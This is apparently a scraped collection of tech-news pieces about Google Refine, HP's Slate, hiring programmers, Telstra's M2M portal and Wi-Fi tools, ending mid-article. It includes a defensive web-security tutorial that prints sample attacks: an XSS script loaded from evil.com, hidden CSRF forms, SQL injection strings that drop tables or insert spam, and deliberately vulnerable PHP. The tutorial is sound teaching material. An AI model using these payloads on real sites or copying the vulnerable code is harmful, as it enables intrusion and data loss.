Google releases data cleanser

Google has updated and re-released open-source software for cleaning, analyzing and transforming data sets, now called Google Refine.

The software, originally called Freebase Gridworks, came with Metaweb, a company Google purchased in July.

Google Refine is a collection of tools that could come in handy when wrangling useful information from a data set, particularly ones that have data inconsistencies.

This desktop application can, for instance, find all the variant spellings of a word in a data set and replace them with the appropriate term. This process, called normalization, is nothing new. But normalizing data usually requires writing code that is specific to one data set, noted Christopher Groskopf, a developer for the Chicago Tribune.

“The genius of Gridworks is that it is generic enough to work for a wide variety of data sets without the need to write any code at all. Even better the resulting operations are portable, so the process used to clean up 2009′s data can be repeated for 2010,” Groskopf wrote in a blog post.

The software contains a number of other tools as well. It includes an expression language that can be used to analyze a set of data. Filters can be used to isolate subsets of data, which then can be analyzed or changed through a set of transform commands.

The software works with plain text files, the data in which can be split into different columns by the use of commas. Results can exported back out in the JSON (JavaScript Object Notation) format, which can then be easily transformed into HTML tables or other formats.

The software can work with up to a few hundred thousand rows per data set, depending on the user’s computer memory. And unlike most spreadsheet software, this software can interactively transform large subsets of data, the company asserted.

Google said this week that it has added several new features to the software, officially called Google Refine 2.0, including the ability to link records to other databases, and a number of new transformation commands and expressions.

The non-profit government watchdog organization ProPublica has used this software to aggregate data from seven different data sets to show how pharmaceutical companies pay doctors to recommend certain medications.

Link

Why HP’s Slate isn’t anything like the iPad

HP released its Slate 500 tablet this week. Immediately, everyone started comparing it with Apple’s iPad. But the two devices have nothing significant in common. They are in entirely different device categories and can even be thought of as opposites.

Some of my fellow journalists, industry watchers, Wall Street types and others seem to have difficulty making this distinction and continue to confuse the public by comparing the two.

I believe there’s an important distinction — as important as the difference between, say, a PDA and a smartphone was back when PDAs existed.

There will be many devices available in the same class and category as the iPad, and there will be many similar to the Slate. If you want to make sense of the new mobile market, you must understand the difference between the HP Slate and the Apple iPad.

Here’s how to make that distinction.

Slate is a motorcycle, iPad is a bicycle

If you think of computing devices as vehicles, with servers being like trucks and PCs like cars, it’s easier to understand tablets. The Slate is like a motorcycle and the iPad like a bicycle.

The motorcycle, like the Slate, is more powerful. That doesn’t mean it’s better. Which is more versatile, functional and usable by the widest range of people? Which one can you take on a bus, or hang inside an apartment? Which one is more likely to be used by children, the elderly and people in small villages around the world? Which is easier to maintain? Which is easier to use? Which is more energy-efficient?

You could argue that a motorcycle is “better” and “more powerful.” But how many motorcycles do you have in your garage, and how many bicycles? There are about 200 million motorcycles in the world, but more than 1.4 billion bicycles.

If you can accept this analogy, then you can understand why it makes no sense to even mention the iPad when reporting the Slate’s availability. When a new motorcycle comes out, the motorcycle magazines don’t ask, “Will this kill the mountain bike?” It would be absurd.

Beyond metaphorical comparisons, what are the actual differences between HP Slate-type devices and Apple iPad-type devices? The differences are of class, interface, generation, usability, market, application model and vision. Let’s look at each.

The class difference

The Slate is a PC. The iPad is an appliance.

The Slate is running the same operating system as your desktop PC and laptop, assuming you’re a Windows 7 user. It’s running components designed for PCs, including eight times the amount of RAM that’s in an iPad. It runs PC applications unmodified.

The only difference between a Slate and a PC is that with the Slate, the screen can be used as an input device; a mouse and keyboard aren’t required. But if you plug in a mouse and keyboard, everything will work fine. There are hundreds of different scenarios for PC input; the HP Slate is just one, and not a particularly exciting or innovative one.

Apple’s iPad, on the other hand, is neither a PC nor an alternative to a PC. You use it in addition to using a PC. It’s an entirely different class of device designed from the ground up to function as an information appliance.

It’s not running a PC operating system and can’t run PC applications. It doesn’t have enough processing power or memory to even attempt such a feat. You can plug in a keyboard, but if you kludge together a system that enables use with a mouse, the UI doesn’t make sense.

The interface difference

The HP Slate’s user interface is the same as a Windows 7 interface on a full-tilt PC. To launch an application, you touch the Start button, then find the application on the menu, then touch to open it. Once open, it works just like all PC user interfaces have worked since the Mac shipped in 1984.

The Slate’s user interface type is called WIMP, for windows, icons, menus and pointing devices. The iPad’s UI doesn’t have windows (not the resizable, overlapping kind), doesn’t have WIMP-style menus and isn’t optimized for pointing devices. It does have icons.

It’s easy to see how the HP Slate’s UI has everything in common with PCs going back to Windows 3.0, Macs going back to 1984 and Linux PCs, and nothing in common with the iPad. Except for the icons.

The generational difference

Since screens have been used to display computers’ user interfaces, there have been three generations. The first generation of screen-based UIs was the command line. To launch an app in DOS, the first-generation OS that predated Windows, you typed the name of that application and hit the Enter key. To move a file, you typed the command for move, followed by the path of the file as understood by the file system. You had to memorize the magic words, and type them in as numbers and letters.

WIMP UIs were the second generation. They were graphical and abstract, and far more intuitive and usable for the general public than command-line computing. We’ve been using the WIMP UI for coming up on four decades now, and the HP Slate is merely the most recent implementation of this second-generation UI paradigm.

Multitouch, physics and gestures (MPG) computing is the third-generation user interface. Microsoft was the first major company to offer an MPG device, with its vertical-market Surface table. Apple was the first major company to offer a consumer MPG device, when it shipped the iPhone in 2007.

MPG devices are far more intuitive because they use the finger to control what’s on screen without any intermediary devices such as a mouse or pen. And on-screen movement mimics the movement of objects in the real world, a fact that subconsciously delights the mind.

MPG computing will largely replace WIMP over the next 10 years. The HP Slate represents the past of computer interfaces, and the iPad, the future.

The usability difference

I haven’t used the HP Slate. But it’s a PC running Windows. As such, the UI won’t be all that thrilling to use, and crashes are likely to be more frequent and problematic.

It’s also hard to believe that installing and uninstalling software on the HP Slate will be even remotely as quick and easy as on the iPad.

And Windows PCs need to be maintained with defragging, registry maintenance and other chores or else they increasingly get slower and less stable over time.

The iPad is a thrill to use. It provides instant gratification, with instant-on and snappy performance. The MPG user interface just feels good to use. The iPad is stable. When it does crash, it recovers quickly and gracefully. It doesn’t need to be “maintained.” It doesn’t often have to be “booted” or “shut down.” It’s also silent.

The market difference

HP is selling the Slate into one market: business.

The iPad, on the other hand, is being sold into dozens of different markets. The iPad will be used by 2-year-olds and senior citizens, school teachers and churches, gamers and TV watchers. And the Slate won’t.

The application model difference

As a Windows 7 PC, the HP Slate uses the Windows application model. You’ll find the application on the vendor’s Web site, most likely, and click to download. You’ll enter in a long CD-key-type string of characters and will have to remember to come back for updates.

During the install process, the application will make changes to the Windows registry and replace system files that may or may not be set back right when you uninstall.

The iPad application model is the App Store, followed by a very clean install and uninstall system. When you visit the App Store, you’re prompted to download updates to all apps that have been issued an improved version. And they’re all installed at once, in a few seconds and without rebooting.

To uninstall, you don’t go to the Control Panel and start hunting for the app. You simply press and hold the icon, then click the X.

The vision difference

Some people think consumer electronics devices are just boxes full of electronics. I think it matters how they come about because it tends to reflect in the quality of the product. Design matters.

The iPad is the product of vision. Some person or group of people at Apple deeply imagined how people might best use a tablet device, as well as why, where, when and how often they might use such a device. They envisioned it, then built it.

I don’t know anything about how the HP Slate came about, but it doesn’t feel like the child of vision. It doesn’t even work anything like it did in the preview videos that were circulating just a few months ago. It feels like a me-too, check-the-tablet-box kind of product, where some suit ordered the engineers to come up with an answer to the iPad to fill a perceived hole in the company’s soup-to-nuts lineup of computing devices.

I’m not dismissing the HP Slate. I’m merely pointing out what it is: The HP Slate is a PC. I like PCs and use one every day. There’s nothing wrong with a touch-based tablet PC. But there’s also nothing new about it.

More importantly, I’m also pointing out what the HP Slate isn’t: The HP Slate is not a post-PC, MPG, third-generation, super-usable, multimarket, App Store-model, visionary device.

So, everybody, please stop comparing it with the iPad.

Mike Elgan writes about technology and tech culture. Contact and learn more about Mike at Elgan.com, or subscribe to his free e-mail newsletter, Mike’s List.

Link

How to hire a programmer when you’re not a programmer

How do you hire a programmer if you’re not one yourself? Some things to look for…

1. How opinionated are they?
Ask them about a juicy programming topic (e.g. Ruby or Python?). The tone and reasoning of the answer will reveal a lot. In our recent podcast on programming, Jeff said, “When people have strong opinions about things — when they can talk at length about something — it’s a good indication that they’re passionate about it.”

2. How much do they contribute to open source projects?
Look at their contributions. Though you may not be a coder, you’ll be able to tell if there’s some code there. And the fact that somebody is contributing something is a good start. “The fact that somebody is contributing at all means they’re using the tool,” said Jamis. “It means they’re scratching an itch, like they ran into something that they thought should be improved, or ran into a bug and they fixed it themselves. That level of participation is a good discriminator.”

3. How much do they enjoy programming?
They don’t have to spend every second of their free time hacking, but you do want to see some level of passion. Jamis said, “It’s not so much that coding in your free time is the important thing so much as it is that you’re showing you’re passionate about it and that you have opinions.”

4. Do they actually ship?
Find out how they manage their work. Software often slips — find out how they avoid this. Find out when they shipped something on time and ask why that project was successful. Or find out lessons learned from a delayed project. “The ability to ship software is critical,” according to Jeremy. “How they manage the very task oriented part of actually needing to get something done and finished by a certain time.”

5. What have they mastered?
Randy Nelson of Pixar argues that mastery in anything is a really good predictor of mastering something else. So look for someone who’s mastered something. Is the candidate a great chef? Or mountain biker? Or something else? That’s a sign they can be a master on your project too. “That sense of I’m going to get to the top of that mountain separates them from all of the other candidates almost instantly,” says Nelson. “There’s very little chance that someone’s going to achieve mastery on the job if they didn’t get there before coming to your workplace.”

6. How well do they communicate?
The less you understand about programming, the more you’re going to rely on this person to translate what’s going on to you. That’s why hiring great writers, regardless of the position, is a good idea. For example, here’s Jeff explaining a Basecamp API update to the rest of the team inside the project site:

I just pushed an update to Basecamp’s People and Companies APIs.

We now allow client and firm employees to see people and companies that they have access to through projects. Prior to this update, firm and client employees could only see people using a specific project ID. There was no way for them to see all people (i.e., colleagues) that they are involved with across projects.

For example, if the API user making the request is on one project with Bob and another with Jill, /people.xml will return Bob and Jill. If the requesting user is an administrator, all people in the account will be returned.

The same is true for companies.

When programmers can both code and speak a language that non-programmers understand, things are a lot less likely to go wrong.

Test drive
If you can, get out of all-or-nothing decision mode. Bringing on a full-time employee is a big, hairy decision. Hiring someone for a mini-project they can do in their spare time is a lot easier for both sides to swallow. “Kick the Tires” in Getting Real talks about this:

Before we hire anyone we give them a small project to chew on first. We see how they handle the project, how they communicate, how they work, etc. Working with someone as they design or code a few screens will give you a ton of insight. You’ll learn pretty quickly whether or not the right vibe is there.

Scheduling can be tough for this sort of thing but even if it’s for just 20 or 40 hours, it’s better than nothing. If it’s a good or bad fit, it will be obvious. And if not, both sides save themselves a lot of trouble and risk by testing out the situation first.

It’s also a good idea to think hard about what you’re offering and how you can make your situation as attractive as possible. The sweeter the pot, the more bees will fly into it. (Hmm, pretty sure that’s not a thing right there. Anyway…) In “Great Hackers,” Paul Graham offers a list of what attracts the best programmers: good tools, open source software, rooms with doors, an interesting problem to solve, and wise coworkers. If you’ve got any/all of those, make sure to let potential hires know.

Do it yourself?
All this stuff can help, but the absolute best way to hire a programmer is to know at least a little bit about programming. Hiring for a job you’ve never done before is really hard. So is managing that person after they’re hired. Graham discusses this in his “Great Hackers” piece:

I’ve seen occasional articles about how to manage programmers. Really there should be two articles: one about what to do if you are yourself a programmer, and one about what to do if you’re not. And the second could probably be condensed into two words: give up.

The problem is not so much the day to day management. Really good hackers are practically self-managing. The problem is, if you’re not a hacker, you can’t tell who the good hackers are.

So see if you can pick up some programming skills before hiring. (As we say in REWORK: “Never hire anyone to do a job until you’ve tried to do it yourself first.”) Jason actually began learning PHP before he partnered up with DHH. Similarly, 37signals didn’t hire a sys admin until one of us had already spent time learning how to set up servers. Go this route and you get a deeper understanding of what you’re looking for in a candidate and the problem(s) you hope to solve.

As for the mistakes you’ll make along the way, keep in mind that’s how “real” programmers work too. “Running our iterations feels like a neverending series of error recoveries,” explains Jeremy. “That sounds demoralizing, but it becomes empowering. Hell, even test-driven development is a series of error recoveries. So some advice is to work this way yourself at first.”

Link

Common Security Mistakes in Web Applications

Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. Most commonly seen in the form of a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article, but take a close look at the other issues. To be more conformant with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Phishing, Shell injection and SQL injection. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.

1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

<?php
  echo "$user said $message";
?>

To read the message in from the user, we’d have code like this:

<?php
  $user = $_COOKIE['user'];
  $message = $_REQUEST['message'];
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

This works only as long as the user sticks to messages in plain text, or perhaps a few safe HTML tags like <strong> or <em>. We’re essentially trusting the user to only enter safe text. An attacker, though, may enter something like this:

Hi there...<script src="h++p://evil.com/bad-script.js"></script>

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message on their own page, they load bad-script.js into their page, and that script could do anything it wanted, for example, it could steal the contents of document.cookie, and then use that to impersonate the user and possibly send spam from their account, or more subtly, change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter contents that are safe to display on the page, we prevent this form of attack. We accomplish this using PHP’s input_filter extension.

We can change our PHP code to the following:

<?php
  $user = filter_input(INPUT_COOKIE, 'user',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  $message = filter_input(INPUT_POST | INPUT_GET, 'message',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case may arise in the future, or a new programmer comes in to the project, and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side-effect of this is that if you have data that needs to be displayed in a non-web context (e.g. a mobile text message/pager message), then it may be unsuitably encoded. You may need further processing of the data before sending it to that context.

Now chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to just set the default filter to FILTER_SANITIZE_SPECIAL_CHARS by changing filter.default in your php.ini file.

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
     style="position:absolute;left:-999em;">

Now all the attacker needs to do, is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

<iframe name="pharma" style="display:none;"></iframe>
<form id="pform"
      action="h++p://www.mybiz.com/post_message"
      method="POST"
      target="pharma">
<input type="hidden" name="message" value="Cheap medicine at ...">
</form>
<script>document.getElementById('pform').submit();</script>

Which will POST the form back to www.mybiz.com.

The correct way to to protect against a CSRF is to use a single use token tied to the user. This token can only be issued to a signed in user, and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, this token needs to be validated. This ensures that the request originated from a page that we control. This token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

<?php
function get_nonce() {
  return md5($salt . ":"  . $user . ":"  . ceil(time()/86400));
}
?>

The timestamp we use is the current time to an accuracy of 1 day (86400 seconds), so it’s valid as long as the action is executed within a day of requesting the page. We could reduce that value for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.

An alternate method might be to generate the nonce without the timestamp, but store it as a session variable or in a server side database along with the time when the nonce was generated. That makes it harder for an attacker to generate the nonce by guessing the time when it was generated.

<?php
function get_nonce() {
  $nonce = md5($salt . ":"  . $user);
  $_SESSION['nonce'] = $nonce;
  $_SESSION['nonce_time'] = time();
  return $nonce;
}
?>

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

<?php
  if(!verify_nonce($_POST['nonce'])) {
     header("HTTP/1.1 403 Forbidden", true, 403);
     exit();
  }
  // proceed normally
?>

This protects us from the CSRF attack since the attacker’s website cannot generate our nonce.

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Now since we use a nonce, we’re protected against CSRF attacks, however, if the user is tricked into clicking the submit link themselves, then the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around such that the submit button is always under the user’s mouse. This was the technique used on the Facebook Like button click-jack attack.

Frame busting appears to be the most obvious way to protect against this, however it isn’t fool proof. For example, adding the security="restricted" attribute to an iframe will stop any frame busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

<input type="text" name="message" value="<?php echo $message ?>">
<input id="msg_btn" type="submit" disabled="true">
<script type="text/javascript">
if(top == self) {
   document.getElementById("msg_btn").disabled=false;
}
</script>

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will also be unable to click the submit button.

4. SQL injection

In this kind of an attack, the attacker exploits insufficient input validation to gain shell access on your database server. XKCD has a humorous take on SQL injection:

Sql in Common Security Mistakes in Web Applications
Full image (from xkcd)

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

<?php
function save_message($user, $message)
{
  $sql = "INSERT INTO Messages (
            user, message
          ) VALUES (
            '$user', '$message'
          )";

  return mysql_query($sql);
}
?>

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like

test');DROP TABLE Messages;--

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

<?php
function save_message($user, $message)
{
  // $dbh is a global database handle
  global $dbh;

  $stmt = $dbh->prepare('
                     INSERT INTO Messages (
                          user, message
                     ) VALUES (
                          ?, ?
                     )');
  return $stmt->execute(array($user, $message));
}
?>

This protects us from SQL injection by correctly making sure that everything in $user goes into the user field and everything in $message goes into the message field even if it contains database meta characters.

There are cases where it’s hard to use prepared statements. For example, if you have a list of values in an IN clause. However, since our SQL statements are always generated by code, it is possible to first determine how many items need to go into the IN clause, and add as many ? placeholders instead.

5. Shell injection

Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example by using the system(), exec() or `` commands. There may be more functions depending on the language you use when building your web app.

The solution is the same for XSS attacks. You need to validate and sanitize all user inputs appropriately for where it will be used. For data that gets written back into an HTML page, we use PHP’s input_filter() function with the FILTER_SANITIZE_SPECIAL_CHARS flag. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist. Attackers find inventive ways of getting around a blacklist.

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it ensures that the user’s browser verifies that the page isn’t being redirected to a malicious site.
  2. Use one and only one URL for user log in, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when the user sees a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth based API. This is also known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

Further reading

  1. OWASP Top 10 security risks
  2. XSS
  3. CSRF
  4. Phishing
  5. Code injection
  6. PHP’s input filters
  7. Password anti-pattern
  8. OAuth
  9. Facebook Like button click-jacking
  10. Anti-anti frame-busting
  11. The Yahoo! Security Center also has articles on how users can protect themselves online.

Link

Telstra unveils machine to machine portal

It’s not just humans who use Telstra’s Next G mobile network to place calls and share data. Increasingly, inanimate objects — cars, vending machines and even digital photo frames are doing the same. And Telstra hopes they will do it even more.

The company has launched a new control centre allowing customers to more easily design, deploy and manage mobile connections between non-human systems — known as “machine to machine” connections.

The technology allows SIM mobile chips and transmitters to be embedded in devices and transmit data without human interaction. A vending machine, for example, could automatically notify a soft drink manufacturer when it needed a refill — or a picture frame could automatically download new photos and display them as they were uploaded to Flickr.

Telstra has been providing M2M services for some time — its biggest customer has close to 100,000 SIMs deployed.

It has announced a new partnership with US-based company, Jasper Wireless, to launch the portal and revamp the way it handles SIMs to be used for M2M purposes.

Previously, Telstra had required each individual SIM to be activated in much the same way that mobile phone SIMs are used. However, now the telco will allow customers to purchase SIMs in bulk that are pre-prepared for M2M purposes. No interaction with Telstra’s systems will be required to activate them.

The telco’s director of M2M products and partnerships, Mike Cihra, said right now the M2M market was worth about $300 million in Australia annually — but Telstra expects it to breach $1 billion over the next four years. And Telstra wants a big slice of that pie.

“What we need to do is put a big sign out the front saying Telstra is open for business — we are the default provider,” he told journalists last week.

Telstra’s director of its Enterprise and Government division, John Paitaridis, said the existing sectors interested in M2M devices were areas such as manufacturing, logistics, transportation, healthcare, utilities and security.

But new markets were also opening up, he said — for example with relation to eReader and GPS navigation devices, vending machines, picture frames and so on.

Previously, he said, customers had had a limited ability to manage their remote SIMs. But the Jasper portal would change that. And Telstra is opening the application programming interface to its system and providing small M2M kits so that even small software developers can get involved.

Telstra has also revamped its bulk billing plans to fit the new M2M paradigm. For example, it now has a $1500 for 30GB a month plan, which includes as many SIMs as users want, along with a smaller $200 for 2GB plan. The developer kit — including three test SIMs, and 50MB of data over a six month period, goes for $199.

Link

6 useful Wi-Fi tools for Windows

We live in a mobile world; if you have a laptop (and who doesn’t?), that means constantly connecting to the Internet via Wi-Fi. You most likely use Wi-Fi not just when you’re on the road at cafés, airports or hotels, but to connect to your home network too. You might even connect to a wireless network at the office.

Here’s the problem: Windows doesn’t do a particularly good job of providing Wi-Fi tools. Yes, it will let you search for and connect to nearby networks, but that’s about the extent of it. What if you want to get detailed information about every Wi-Fi network within range, troubleshoot your network, turn your laptop into a portable Wi-Fi hot spot or keep yourself safe at public hot spots? Windows is no help.

That’s why we’ve rounded up these six downloads. They’ll do all these things and more. Five out of the six are free; the other is inexpensive and lets you try it out first.

InSSIDer

MetaGeek’s InSSIDer is a great tool for finding Wi-Fi networks within range of your computer and gathering a great deal of information about each. It’s also useful for troubleshooting problems with your own Wi-Fi network.

For every Wi-Fi network InSSIDer finds, it shows you the MAC address of the router, the router manufacturer (if it can detect it — it usually does), the channel it’s using, the service set identifier (SSID) or public name of the network, what kind of security is in place, the speed of the network and more. In addition, it displays the current signal strength of the network, as well as its signal strength over time.

How would you use the software to troubleshoot your wireless network? If you see that your network uses the same channel as nearby networks with strong signals, you’ll know that you should change the channel your network transmits over and thereby cut down on potential conflicts. (Most routers have a settings screen that lets you do this.)

You can also use the software to detect “dead zones” that don’t get a strong Wi-Fi connection. Walk around your home or office with InSSIDer installed on your laptop to see where signal strength drops. You can either avoid using a computer in those spots or else try repositioning the wireless router to see if it helps with coverage.

Whether you need to troubleshoot a network or find Wi-Fi hot spots to which you want to connect — or you’re just plain curious — this is one app you’ll want to download and try.

Price: Free

Compatible with: Windows XP, Vista and 7 (32- and 64-bit)

Download InSSIDer

Xirrus Wi-Fi Inspector

This is another excellent program that sniffs out Wi-Fi networks and shares pertinent information about them, such as how close or far away they are. Xirrus Wi-Fi Inspector shows any nearby hot spots on a radar-like display. A separate pane offers detailed information about every hot spot it finds, including signal strength, the kind of network (802.11n, for example), the router vendor, the channel on which the network transmits and whether it’s an access point or an ad hoc network.

In a pane next to the radar, Wi-Fi Inspector shows you even more detailed information about the network to which you’re currently connected, including your internal IP address, external IP address, DNS and gateway information, and so on.

Why use Xirrus Wi-Fi Inspector rather than MetaGeek’s InSSIDer? Wi-Fi Inspector’s simpler, cleaner layout makes it easier to see information about all of the hot spots at a glance. It also shows the relative physical distance between you and each hot spot on its display. And there’s no denying the overall coolness factor of a radar-like display.

However, if you want more detailed information, including the relative signal strengths of all nearby wireless networks, InSSIDer is a better bet.

Price: Free

Compatible with: Windows XP SP2+, Vista and 7

Download Xirrus Wi-Fi Inspector

Connectify

This very nifty piece of free software lets you turn a Windows 7 PC (it only works with Windows 7) into a Wi-Fi hot spot that can be used by nearby devices — your smartphone, for example, or devices that your co-workers are using in the same location.

The PC on which you install it will, of course, need to be connected to the Internet itself and have Wi-Fi capability so it can provide access to other devices. The computer doesn’t necessarily need a wired connection to the Internet (although it won’t hurt to have one); its Wi-Fi card can perform double-duty as Wi-Fi signal receiver and transmitter.

Setting up a hot spot is simple: Once you have a connection, run Connectify on your PC and give your hot spot a name and password. Your computer’s Wi-Fi card will begin broadcasting a Wi-Fi signal that other devices can connect to, in the same way they can connect to any other hot spot. (Your PC card will broadcast in whatever Wi-Fi protocol it was built for. It also should support devices that use earlier protocols — for example, an 802.11n signal should allow 802.11b/g/n devices to connect.)

Since your hot spot is password-protected, only people who know the password can use it; the signal is secured with WPA2-PSK encryption.

You can even use Connectify to set up a local network without an external Internet connection. Run it as a hot spot, and nearby devices can connect to each other in a network, even though there’s no Internet access. You can use this for sharing files in a workgroup or setting up a network for multiplayer games.

Note that I had problems connecting my Mac to a Windows 7 machine running a Connectify-created hot spot, but I was able to make the connection with other PCs and devices.

Price: Free

Compatible with: Windows 7

Download Connectify

WeFi

Tools like InSSIDer and Xirrus Wi-Fi Inspector are great for finding hot spots that are currently in range of your laptop. But if you want to find hot spots in other locations — a part of town that you’ll be in later in the day, for example, or a city you’ll be visiting next week — you’ll want to give WeFi a try.

Like other Wi-Fi sniffing tools, WeFi uses your Wi-Fi card to find your current location and show you nearby hot spots. You can click on a link to see a particular hot spot on a map, along with its address. (Note, however, that in practice I found it was not always accurate.)

But you can also type in a different location to see hot spots near that location. Click the Wi-Fi Maps tab and enter an address; a map of that location will appear on Google Maps and you’ll be provided with various details about nearby hot spots, such as type (municipal, hotel, café and so on), distance from the location and whether there’s an access fee.

WeFi also helps you manage how to connect to hot spots. It can, for example, automatically connect you only to your favorite hot spots or only to hot spots that have been discovered by other WeFi members.

The basic version of WeFi is free, but there’s also a version called WeFi Premium that you have to pay for. WeFi Premium finds and connects you to paid hot spots. The amount you pay for WeFi Premium varies depending on whether you want to pay an hourly rate, prepay for a certain number of minutes and so on. You’d be better off skipping WeFi Premium; it’s much easier to find paid hot spots on your own.

Price: Free

Compatible with: Windows XP, Vista and 7

Download WeFi

Hotspot Shield

When you connect to the Internet via a public hot spot, you put yourself at risk because someone might try to sniff your packets or otherwise snoop on what you’re doing online. Hotspot Shield, a free, lightweight piece of software from AnchorFree, promises to keep you safe by creating a secure VPN connection and encrypting all of your communications.

